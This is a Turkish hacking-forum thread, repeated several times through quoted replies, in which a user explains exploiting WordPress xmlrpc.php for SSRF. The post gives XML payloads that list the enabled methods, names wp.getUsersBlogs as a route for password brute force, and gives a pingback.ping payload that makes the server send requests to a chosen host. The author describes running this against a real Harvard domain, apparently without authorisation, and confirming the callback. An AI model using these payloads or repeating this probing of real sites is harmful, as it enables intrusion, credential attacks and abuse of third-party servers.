# WordPress Xmlrpc SSRF Zafiyeti Nedir ? #

P4$A · 27 Eyl 2023

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .
Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.
Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.

Ben daha önceden göz attığım bir hedef belirledim,
harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım xmlrpc.php dosyasına erişebilecek miyiz.

Evet burada bize xmlrpc server ın sadece post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.

Görüldüğü gibi POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.

XML:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Görüldüğü üzere çokça method açık wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.

XML:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>

Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama pingback metodu ile.

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.

XML:

<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>

Ben burpsuite'in içindeki collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.

Okuyup ta yorum yazmayan arkadaşlara selam olsun.

H@cked BaBy · 27 Eyl 2023

P4$A' Alıntı:
Okuyup ta yorum yazmayan arkadaşlara selam olsun.

Ve Aleyküm selam

Suppressor · 27 Eyl 2023

Eline sağlık, abi.

Toryy · 27 Eyl 2023

Emeğinize sağlık

P4$A · 27 Eyl 2023

H@cked BaBy' Alıntı:
Ve Aleyküm selam

Suppressor' Alıntı:
Eline sağlık, abi.

Sağ ol canım

Toryy' Alıntı:
Emeğinize sağlık

Teşekkürler Canım

Normalde böyle şeyler yapmam ama up+

harasad · 27 Eyl 2023

P4$A' Alıntı:
Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .
Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.
Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.

Ben daha önceden göz attığım bir hedef belirledim,
harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım xmlrpc.php dosyasına erişebilecek miyiz.

Evet burada bize xmlrpc server ın sadece post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.

Görüldüğü gibi POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.

XML:

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Görüldüğü üzere çokça method açık wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.

XML:

<methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>Username</value></param> <param><value>Password</value></param> </params> </methodCall>

Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama pingback metodu ile.

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.

XML:

<methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param> <param><value><string>http://zafiyetli_hedef_site</string></value></param> </params> </methodCall>

Ben burpsuite'in içindeki collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.

Okuyup ta yorum yazmayan arkadaşlara selam olsun.

Böyle paylaşıma yorum yazılmaz mı? Eline sağık

invisible blood · 27 Eyl 2023

P4$A' Alıntı:
Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .
Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.
Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.

Ben daha önceden göz attığım bir hedef belirledim,
harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım xmlrpc.php dosyasına erişebilecek miyiz.

Evet burada bize xmlrpc server ın sadece post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.

Görüldüğü gibi POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.

XML:

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Görüldüğü üzere çokça method açık wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.

XML:

<methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>Username</value></param> <param><value>Password</value></param> </params> </methodCall>

Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama pingback metodu ile.

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.

XML:

<methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param> <param><value><string>http://zafiyetli_hedef_site</string></value></param> </params> </methodCall>

Ben burpsuite'in içindeki collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.

Okuyup ta yorum yazmayan arkadaşlara selam olsun.

Teşekkür ederiz hocam

OBT is HeRYerDe · 27 Eyl 2023

Elinize Sağlık Hocam.

I AM EAC0D3Rx · 28 Eyl 2023

Elinize sağlık

V3YS0Z · 28 Eyl 2023

Elinize Sağlık Hocam.

The Gölge · 28 Eyl 2023

Aleyküm selam

Joe McLean · 28 Eyl 2023

P4$A' Alıntı:
Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .
Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.
Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.

Ben daha önceden göz attığım bir hedef belirledim,
harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım xmlrpc.php dosyasına erişebilecek miyiz.

Evet burada bize xmlrpc server ın sadece post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.

Görüldüğü gibi POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.

XML:

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Görüldüğü üzere çokça method açık wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.

XML:

<methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>Username</value></param> <param><value>Password</value></param> </params> </methodCall>

Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama pingback metodu ile.

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.

XML:

<methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param> <param><value><string>http://zafiyetli_hedef_site</string></value></param> </params> </methodCall>

Ben burpsuite'in içindeki collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.

Okuyup ta yorum yazmayan arkadaşlara selam olsun.

Çok güzel konu ve çok güzel anlatım. Teşekkürler!

Nivova · 28 Eyl 2023

Elinize sağlık.

Osmangazi · 28 Eyl 2023

Elinize sağlık

P4$A · 28 Eyl 2023

harasad' Alıntı:
Böyle paylaşıma yorum yazılmaz mı? Eline sağık

Değerli yorumunuz için ben teşekkür ederim.

invisible blood' Alıntı:
Teşekkür ederiz hocam

Rica ederim kardeşim.

OBT is HeRYerDe' Alıntı:
Elinize Sağlık Hocam.

Rica ederim değerli dostum sende bu şekilde az bilinen konuları aç.

404Qea' Alıntı:
Elinize sağlık

Teşekkürler

V3YS0Z' Alıntı:
Elinize Sağlık Hocam.

Teşekkürler

The Gölge' Alıntı:
Aleyküm selam

Bu bu kamile ne desem olmuyor zaten.

Joe McLean' Alıntı:
Çok güzel konu ve çok güzel anlatım. Teşekkürler!

Çok güzel yorum

. Teşekkürler

Nivova' Alıntı:
Elinize sağlık.

Teşekkürler

Osmangazi' Alıntı:
Elinize sağlık

Teşekkür ederim, değerli admin abim.

louise0357 · 28 Eyl 2023

P4$A' Alıntı:
Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .
Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.
Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.

Ben daha önceden göz attığım bir hedef belirledim,
harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım xmlrpc.php dosyasına erişebilecek miyiz.

Evet burada bize xmlrpc server ın sadece post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.

Görüldüğü gibi POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.

XML:

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Görüldüğü üzere çokça method açık wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.

XML:

<methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>Username</value></param> <param><value>Password</value></param> </params> </methodCall>

Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama pingback metodu ile.

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.

XML:

<methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param> <param><value><string>http://zafiyetli_hedef_site</string></value></param> </params> </methodCall>

Ben burpsuite'in içindeki collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.

Okuyup ta yorum yazmayan arkadaşlara selam olsun.

Elinize sağlık hocam

P4$A · 30 Eyl 2023

louise0357' Alıntı:
Elinize sağlık hocam

teşekkürler canım

# WordPress Xmlrpc SSRF Zafiyeti Nedir ? #

P4$A

Anka Emektar

H@cked BaBy

Medyanın Yıldızı

Suppressor

Request Uzmanı

Toryy

Kıdemli Üye

P4$A

Anka Emektar

harasad

Katılımcı Üye

invisible blood

Uzman üye

OBT is HeRYerDe

Anka Team

I AM EAC0D3Rx

Uzman üye

V3YS0Z

Kulüpler Genel Sorumlusu

The Gölge

Saldırı Timleri Emektar

Joe McLean

Yeni üye

Nivova

Üye

Osmangazi

Administrator

P4$A

Anka Emektar

louise0357

Anka Team Junior

P4$A

Anka Emektar

Sosyal medya sayfalarımız